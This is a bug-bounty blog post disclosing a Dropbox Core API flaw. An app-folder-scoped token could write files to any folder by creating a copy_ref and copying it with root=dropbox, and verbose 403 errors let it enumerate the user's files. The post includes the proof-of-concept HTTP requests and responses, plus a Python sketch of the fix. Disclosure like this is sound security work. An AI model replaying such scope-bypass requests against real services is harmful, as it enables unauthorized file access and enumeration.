Pranav Hivarekar's Security Blog

REST-API Lover | Security Researcher | API Coder | Ambivert | GET /noob


Dropbox's Critical Bug - an app with access ONLY to its `App folder` could post and enumerate files in any folder

Description

Dropbox offers two APIs:

  1. Core Api (https://www.dropbox.com/developers/core)
  2. Business Api (https://www.dropbox.com/developers/business)

The two APIs have different permission models, i.e. each exposes its own distinct set of scope permissions.

I was testing the Core API and found a pretty bad authorization bypass. Let me explain what it was.
Also, I would like to add that this bug was open for almost 2 years from the initial launch of the API.

Dropbox's Core API offers several scope permissions; see the developer guide (https://www.dropbox.com/developers/reference/devguide).

The App Folder scope got my attention

A dedicated folder named after your app is created within the Apps folder of a user's Dropbox. Your app gets read and write access to this folder only and users can provide content to your app by moving files into this folder.
In simple words, an app can access only the folder that was created for it. It has no access to other folders or to the root folder, so an app can post/delete files ONLY in its own folder.
E.g. if Pranav's app has created the folder "Pranav's app", the app can access ONLY that folder and nothing else.

But I was able to circumvent this permission model and post files into any folder of my choice in the Dropbox.

Proof Of Concept

This is a purely logical attack.
Two steps were required to post files into other folders:

  1. Create a file in app's respective App Folder.
  2. Create file's copy reference.
  3. Copy file to any folder using copy reference.

Request:
Creating a copy reference for test.png, which is already uploaded in the App Folder

(Making a copy_ref ---> https://www.dropbox.com/developers/core/docs#copy_ref)

GET https://api.dropbox.com/1/copy_ref/auto/test.png?access_token=redacted

Response:

{"expires": "Sun, 30 Apr 2045 07:23:24 +0000", "copy_ref": "JipjFzJqMDZrdGhqNTRnZA"}

Copy reference successfully created.


Request:
Copying test.png to an arbitrary folder using the copy reference

(Copying file to a new location ---> https://www.dropbox.com/developers/core/docs#fileops-copy)

POST https://api.dropbox.com/1/fileops/copy?root=dropbox&from_copy_ref=JipjFzJqMDZrdGhqNTRnZA&to_path=/hacked.txt&access_token=redacted

Response:

{"rev": "206262a6317", "thumb_exists": false, "path": "/hacked.txt", "is_dir": false, "client_mtime": "Fri, 08 May 2015 06:03:20 +0000", "icon": "page_white_text", "bytes": 15110, "modified": "Fri, 08 May 2015 07:41:19 +0000", "size": "14.8 KB", "root": "app_folder", "mime_type": "text/plain", "revision": 518}

The file was successfully copied to the root directory.


The vulnerable parameter is root=dropbox. A root of auto resolves paths relative to the App Folder, whereas dropbox resolves them from the root of the user's Dropbox, and the endpoint did not check that an app-folder token was allowed to write there.

If a file with the same name was already present, the API returned verbose errors. This allowed me to enumerate all files present in the Dropbox.
E.g. if test.png already exists in the root directory and we try to post a file with the same name, the API returns verbose errors and status 403 Forbidden, a clear indication that the file exists.
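To show the server-side check the copy endpoint was missing, here is an added example (my own illustration, not Dropbox's code): a hypothetical copy handler that resolves the requested root and path to an absolute target, refuses targets outside the token's App Folder, and answers every out-of-scope target with one uniform 403 so the response no longer reveals whether a file exists there. Token, resolve_path, is_within_scope and copy_with_ref are assumed names; the scope strings and the "/Apps/<app>" layout are assumptions too.

```python
import posixpath
from dataclasses import dataclass


@dataclass(frozen=True)
class Token:
    scope: str     # assumed values: "app_folder" or "full_dropbox"
    app_name: str  # name of the folder created under /Apps/ for this app


def resolve_path(token, root, path):
    """Map the request's (root, path) onto an absolute path in the user's Dropbox.

    root=auto is relative to the app's folder for app-folder tokens; root=dropbox
    is relative to the Dropbox root. normpath canonicalises the result so the
    scope check below runs on the real target, not on the raw request string.
    """
    if root not in ("auto", "dropbox"):
        raise ValueError("unknown root")
    base = "/"
    if root == "auto" and token.scope == "app_folder":
        base = "/Apps/" + token.app_name
    return posixpath.normpath(posixpath.join(base, path.lstrip("/")))


def is_within_scope(token, target):
    """An app_folder token may only touch paths inside its own app folder.

    This comparison on the resolved target is what the vulnerable endpoint
    skipped: it honoured the caller's root=dropbox without checking the scope.
    """
    if token.scope == "full_dropbox":
        return True
    folder = "/Apps/" + token.app_name
    return target == folder or target.startswith(folder + "/")


def copy_with_ref(token, root, to_path, existing):
    """Authorise a copy_ref -> to_path copy; return (status, body).

    'existing' is the constructed set of paths already present in the account.
    Out-of-scope targets get the same 403 whether or not a file exists there,
    closing the enumeration side-channel; collisions inside the app's own
    folder may still be reported, since the app can list that folder anyway.
    """
    target = resolve_path(token, root, to_path)
    if not is_within_scope(token, target):
        return 403, {"error": "path is outside the app's folder"}
    if target in existing:
        return 403, {"error": "a file already exists at " + target}
    existing.add(target)
    return 200, {"path": target, "root": token.scope}
```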


I successfully submitted this bug to Dropbox's Flex bounty, which was hosted on Bugcrowd, and won first prize.


Video Proof Of Concept

Special Thanks

First I would like to thank Philippe Harewood (http://philippeharewood.com/) for motivating all of us with his research on Facebook's API.

Later, I would like to convey my thanks to Bugcrowd for the support they showed me.

And lastly, I would like to thank Dropbox for successfully hosting their Flex bounty. :-)

Cheers all round! :-)